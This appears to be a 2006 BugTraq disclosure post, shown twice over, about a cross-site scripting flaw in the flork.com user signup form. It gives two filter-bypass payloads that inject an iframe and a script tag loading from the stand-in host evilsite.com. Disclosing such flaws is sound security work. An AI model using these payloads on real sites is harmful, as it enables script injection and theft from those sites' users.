BugTraq
Back to list
|
Post reply
Flork.com
Jun 10 2006 08:49PM
luny youfucktard com
Flork.com
Effected files:
input boxes when creating a new user
XSS Vulnerabiliy:
We notice by adding empty tags and endingand beginning brackets we can bypass the filter of the flork.com signup.
For PoC try adding either one of the below codes in as your name:
">'>'><iframe src=http://evilsite.com/scriptlet.html <<"<'<'
">'>'><SCRIPT SRC=http://evilsite.com/xss.js></SCRIPT><'<'
[ reply ]
Privacy Statement
Copyright 2010, SecurityFocus
Effected files:
input boxes when creating a new user
XSS Vulnerabiliy:
We notice by adding empty tags and endingand beginning brackets we can bypass the filter of the flork.com signup.
For PoC try adding either one of the below codes in as your name:
">'>'><iframe src=http://evilsite.com/scriptlet.html <<"<'<'
">'>'><SCRIPT SRC=http://evilsite.com/xss.js></SCRIPT><'<'
[ reply ]